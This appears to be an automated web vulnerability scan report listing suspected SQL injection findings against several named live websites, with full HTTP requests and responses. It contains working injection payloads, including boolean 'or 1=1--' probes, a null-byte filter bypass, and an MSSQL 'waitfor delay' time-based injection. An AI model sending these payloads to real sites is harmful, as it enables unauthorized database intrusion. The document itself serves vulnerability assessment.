GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-406387893378091285094699'%20or%201%3d1--%20&adurl=;ord=2114915439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 11:37:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 862

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/c/206/%2a/k;228460640;1-0;0;50161665;3454-728/90;39961083/39978870/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-406387893378091285094699'%20or%201%3d1--%20&adurl=http%3a%2f%2fwww.transunion.com/%3Fam%3D2033%26channel%3Dpaid%26cid%3Ddisplay%3A2033"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_728x90_Free2011Score.gif" border=0 alt="Advertisement"></a>

Request 2

GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-406387893378091285094699'%20or%201%3d2--%20&adurl=;ord=2114915439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 11:37:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 849

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/c/206/%2a/u;228460640;0-0;0;50161665;3454-728/90;39921263/39939050/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-406387893378091285094699'%20or%201%3d2--%20&adurl=http%3a%2f%2fwww.transunion.com/%3Fam%3D2033%26channel%3Dpaid%26cid%3Ddisplay%3A2033"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_728x90.gif" border=0 alt="Advertisement"></a>

1.2. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 (URL-decoded: " and 1=1-- " and " and 1=2-- ") were each submitted as the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. Here the injected parameter name does not appear in either response, and the two responses differ only in the creative served and its click-tracking path, the same per-request rotation seen in 1.1. A parameter that is neither reflected nor changes the server-side result beyond what the endpoint does on its own is not evidence of an injection point.

Request 1

GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=;ord=2114915439?&1%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 11:39:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 835

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/c/1eb/%2a/k;228460640;1-0;0;50161665;3454-728/90;39961083/39978870/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.transunion.com/%3Fam%3D2033%26channel%3Dpaid%26cid%3Ddisplay%3A2033"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_728x90_Free2011Score.gif" border=0 alt="Advertisement"></a>

Request 2

GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=;ord=2114915439?&1%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 11:39:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 822

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/c/1eb/%2a/u;228460640;0-0;0;50161665;3454-728/90;39921263/39939050/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.transunion.com/%3Fam%3D2033%26channel%3Dpaid%26cid%3Ddisplay%3A2033"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_728x90.gif" border=0 alt="Advertisement"></a>

1.3. http://afreshbunch.com/ [ASPSESSIONIDSSTDDTRS cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://afreshbunch.com
Path:   /

Issue detail

The ASPSESSIONIDSSTDDTRS cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ASPSESSIONIDSSTDDTRS cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET / HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB%00'; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.14.10.1303778640

Response 1 (redirected)

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:19:50 GMT
Connection: close
Content-Length: 60

<html><body><h1> HTTP/1.1 Server Too Busy</h1></body></html>

Request 2

GET / HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB%00''; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.14.10.1303778640

Response 2 (redirected)

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 124
Content-Type: text/html
Location: ../
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:20:24 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../">here</a>.</body>

1.4. http://afreshbunch.com/files/com/call.asp [site_id parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://afreshbunch.com
Path:   /files/com/call.asp

Issue detail

The site_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the site_id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /files/com/call.asp?page=stats&instance_id=CB37911B-6349-45F9-8E60-626BA164D748&site_id=453756%00'&muid=NOMEMBER&lastpage=%2Fforums%2Fdefault%2Easp%3Fpage%3Dpost%26id%3DA1068400%2D5C67%2D4276%2DA448%2D8E648C68CF74%26fid%3D1E97BB3C%2D73BC%2D40AF%2D9065%2DB0C5EBC2FF2E%26lastp%3D1%26cachecommand%3Dbypass&loadtime=0.19 HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://afreshbunch.com/forums/?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1E97BB3C-73BC-40AF-9065-B0C5EBC2FF2E&lastp=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.7.10.1303778640

Response 1

HTTP/1.1 302 Object moved
Location: /system/500error.asp?500;http://afreshbunch.com/files/com/call.asp
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:16:47 GMT
Connection: close
Content-Length: 0

Request 2

GET /files/com/call.asp?page=stats&instance_id=CB37911B-6349-45F9-8E60-626BA164D748&site_id=453756%00''&muid=NOMEMBER&lastpage=%2Fforums%2Fdefault%2Easp%3Fpage%3Dpost%26id%3DA1068400%2D5C67%2D4276%2DA448%2D8E648C68CF74%26fid%3D1E97BB3C%2D73BC%2D40AF%2D9065%2DB0C5EBC2FF2E%26lastp%3D1%26cachecommand%3Dbypass&loadtime=0.19 HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://afreshbunch.com/forums/?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1E97BB3C-73BC-40AF-9065-B0C5EBC2FF2E&lastp=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.7.10.1303778640

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 306
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:17:21 GMT


//document.write("<textarea>/forums/default.asp?page=*)(sn=*)(sn=*&sa=mine</textarea>")
//document.write("<br><textarea>/forums/default.asp?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1
...[SNIP]...

1.5. http://afreshbunch.com/user/453756/theme/design/AFB2011/style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /user/453756/theme/design/AFB2011/style.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 3. The application took 99838 milliseconds to respond to the request, compared with 1055 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /user/453756/theme',0,0,0)waitfor%20delay'0%3a0%3a20'--/design/AFB2011/style.css?2011425200341 HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://afreshbunch.com/about.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.5.10.1303778640; site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB

Response (redirected)

HTTP/1.1 500 Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:14:06 GMT
Connection: close
Content-Length: 60

<html><body><h1> HTTP/1.1 Server Too Busy</h1></body></html>

1.6. https://store.tenable.com/ [cPath parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://store.tenable.com
Path:   /

Issue detail

The cPath parameter appears to be vulnerable to SQL injection attacks. The payloads 90230064%20or%201%3d1--%20 and 90230064%20or%201%3d2--%20 were each submitted in the cPath parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?main_page=index&cPath=190230064%20or%201%3d1--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 25 Apr 2011 23:52:35 GMT
Server: Apache
Content-Length: 202
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /
on this server.</p>
</body></html>

Request 2

GET /?main_page=index&cPath=190230064%20or%201%3d2--%20 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:52:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 26937

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping " />
<meta name="description" content="Tenable Store - ProfessionalFeed Training ProfessionalFeed Renewals Perimeter Service ecommerce, open source, shop, online shopping" />
<meta http-equiv="imagetoolbar" content="no" />
<meta name="author" content="Tenable Network Security" />
<meta name="robots" content="noindex, nofollow" />

<base href="https://store.tenable.com/" />

<link rel="stylesheet" href="includes/templates/tenable/css/t.css?v=1">
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

